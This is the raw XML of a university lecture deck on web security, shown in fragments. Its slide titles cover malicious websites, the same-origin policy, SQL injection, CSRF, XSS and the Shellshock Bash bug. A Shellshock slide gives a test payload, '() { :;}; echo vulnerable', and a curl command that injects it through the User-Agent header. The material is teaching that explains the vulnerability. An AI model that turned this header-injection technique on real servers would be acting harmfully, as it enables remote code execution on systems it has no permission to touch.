        <p:spPr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Crux of the Problem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Any environment variable can contain  a function definition that the Bash parser will execute before it can process any other commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Environment variables can be inherited from other parties, who can thus inject code that Bash will execute.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Malicious Websites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3" y="1417638"/>
            <a:ext cx="5389034" cy="51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469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Web Server Exploit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257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Tx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Send Web Server an HTTP request for a script with an HTTP header such as HTTP_USER_AGENT set to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 eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Lucida Console" pitchFamily="-111" charset="0"/>
              </a:rPr>
              <a:t>'() { :;}; echo vulnerable'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 eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>When the Bash shell runs the script it will evaluate the environment variable HTTP_USER_AGENT and run the echo command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curl -H "User-Agent: () { :; }; echo vulnerable" http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>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Processing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VM gets about 300,000 suspicious URLs daily </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>About </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>10,000 to 30,000 are malicious </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRP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3" y="2596444"/>
            <a:ext cx="5960840" cy="42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21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constitutes the content of a web page?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authored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>content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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-contributed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>content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dvertising</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>third</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-party widgets </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ceding control to 3rd party could be a security risk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302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5415</TotalTime>
  <Words>3667</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>501</Paragraphs>
  <Slides>70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Lecture 9 – Web Security</vt:lpstr>
      <vt:lpstr>Security on the web </vt:lpstr>
      <vt:lpstr>￼The Ghost In The Browser Analysis of Web-based Malware ￼</vt:lpstr>
      <vt:lpstr>Introduction </vt:lpstr>
      <vt:lpstr>Introduction </vt:lpstr>
      <vt:lpstr>Detecting Malicious Websites </vt:lpstr>
      <vt:lpstr>Detecting Malicious Websites </vt:lpstr>
      <vt:lpstr>Processing Rate</vt:lpstr>
      <vt:lpstr>Content Control</vt:lpstr>
      <vt:lpstr>Web Server Security </vt:lpstr>
      <vt:lpstr>Advertising </vt:lpstr>
      <vt:lpstr>Third-Party Widgets </vt:lpstr>
      <vt:lpstr>Malware Trends and Statistics</vt:lpstr>
      <vt:lpstr>Exploiting Software</vt:lpstr>
      <vt:lpstr>Tricking the User</vt:lpstr>
      <vt:lpstr>Malware Classifications </vt:lpstr>
      <vt:lpstr>Remotely Linked Exploits </vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Security on the web </vt:lpstr>
      <vt:lpstr>Same-origin policy </vt:lpstr>
      <vt:lpstr>Same-origin policy </vt:lpstr>
      <vt:lpstr>Same-origin policy </vt:lpstr>
      <vt:lpstr>Same-origin policy </vt:lpstr>
      <vt:lpstr>Web Review | HTTP</vt:lpstr>
      <vt:lpstr>Web Review | AJAX (jQuery style)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Web Review | Same-Origin Policy (SOP)</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection Defense</vt:lpstr>
      <vt:lpstr>Cross-site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Web Review | Same-Origin Policy (SOP)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS) Attack</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS) Attack</vt:lpstr>
      <vt:lpstr>XSS Defenses</vt:lpstr>
      <vt:lpstr>Security on the web </vt:lpstr>
      <vt:lpstr>Shellshock a.k.a. Bashdoor / Bash bug (Disclosed on Sep 24, 2014)</vt:lpstr>
      <vt:lpstr>Bash Shell</vt:lpstr>
      <vt:lpstr>Environment Variables</vt:lpstr>
      <vt:lpstr>Stored Bash Shell Script</vt:lpstr>
      <vt:lpstr>Hello World!  Example</vt:lpstr>
      <vt:lpstr>Dynamic Web Content Generation</vt:lpstr>
      <vt:lpstr>Common Gateway Interface (CGI)</vt:lpstr>
      <vt:lpstr>CGI Input</vt:lpstr>
      <vt:lpstr>CGI Output</vt:lpstr>
      <vt:lpstr>Example Script (Wikipedia)</vt:lpstr>
      <vt:lpstr>Windows Web server running cygwin</vt:lpstr>
      <vt:lpstr>Shellshock Vulnerability</vt:lpstr>
      <vt:lpstr>Cygwin Bash Shell Shows Vulnerability</vt:lpstr>
      <vt:lpstr>Alternatively</vt:lpstr>
      <vt:lpstr>Crux of the Problem</vt:lpstr>
      <vt:lpstr>Web Server Exploit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Bailey</dc:creator>
  <cp:lastModifiedBy>Michael</cp:lastModifiedBy>
  <cp:revision>128</cp:revision>
  <cp:lastPrinted>2012-09-18T16:35:50Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-02-04T19:34:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-22T19:17:51Z</dcterms:modified>
</cp:coreProperties>
</file>